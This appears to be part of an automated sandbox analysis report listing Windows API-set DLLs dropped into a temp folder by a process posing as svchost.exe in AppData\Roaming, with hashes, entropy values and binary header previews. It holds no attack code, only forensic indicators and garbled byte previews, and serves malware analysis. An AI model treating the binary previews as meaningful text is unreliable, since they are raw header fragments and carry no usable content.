                          Entropy (8bit):7.080160932980843
                          Encrypted:false
                          SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                          MD5:502263C56F931DF8440D7FD2FA7B7C00
                          SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                          SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                          SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-datetime-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.093995452106596
                          Encrypted:false
                          SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                          MD5:CB978304B79EF53962408C611DFB20F5
                          SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                          SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                          SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-debug-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1028816880814265
                          Encrypted:false
                          SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                          MD5:88FF191FD8648099592ED28EE6C442A5
                          SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                          SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                          SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-errorhandling-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.126358371711227
                          Encrypted:false
                          SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                          MD5:6D778E83F74A4C7FE4C077DC279F6867
                          SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                          SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                          SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):21816
                          Entropy (8bit):7.014255619395433
                          Encrypted:false
                          SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                          MD5:94AE25C7A5497CA0BE6882A00644CA64
                          SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                          SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                          SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.112057846012794
                          Encrypted:false
                          SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                          MD5:E2F648AE40D234A3892E1455B4DBBE05
                          SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                          SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                          SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l2-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.166618249693435
                          Encrypted:false
                          SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                          MD5:E479444BDD4AE4577FD32314A68F5D28
                          SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                          SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                          SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-handle-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1117101479630005
                          Encrypted:false
                          SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                          MD5:6DB54065B33861967B491DD1C8FD8595
                          SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                          SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                          SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-heap-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.174986589968396
                          Encrypted:false
                          SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                          MD5:2EA3901D7B50BF6071EC8732371B821C
                          SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                          SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                          SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-interlocked-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17856
                          Entropy (8bit):7.076803035880586
                          Encrypted:false
                          SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                          MD5:D97A1CB141C6806F0101A5ED2673A63D
                          SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                          SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                          SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-libraryloader-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.131154779640255
                          Encrypted:false
                          SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                          MD5:D0873E21721D04E20B6FFB038ACCF2F1
                          SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                          SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                          SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-localization-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.089032314841867
                          Encrypted:false
                          SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                          MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                          SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                          SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                          SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-memory-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.101895292899441
                          Encrypted:false
                          SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                          MD5:D500D9E24F33933956DF0E26F087FD91
                          SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                          SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                          SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-namedpipe-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.16337963516533
                          Encrypted:false
                          SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                          MD5:6F6796D1278670CCE6E2D85199623E27
                          SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                          SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                          SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processenvironment-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.073730829887072
                          Encrypted:false
                          SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                          MD5:5F73A814936C8E7E4A2DFD68876143C8
                          SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                          SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                          SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19392
                          Entropy (8bit):7.082421046253008
                          Encrypted:false
                          SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                          MD5:A2D7D7711F9C0E3E065B2929FF342666
                          SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                          SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                          SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.1156948849491055
                          Encrypted:false
                          SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                          MD5:D0289835D97D103BAD0DD7B9637538A1
                          SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                          SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                          SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-profile-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17712
                          Entropy (8bit):7.187691342157284
                          Encrypted:false
                          SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                          MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                          SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                          SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                          SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-rtlsupport-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17720
                          Entropy (8bit):7.19694878324007
                          Encrypted:false
                          SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                          MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                          SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                          SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                          SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
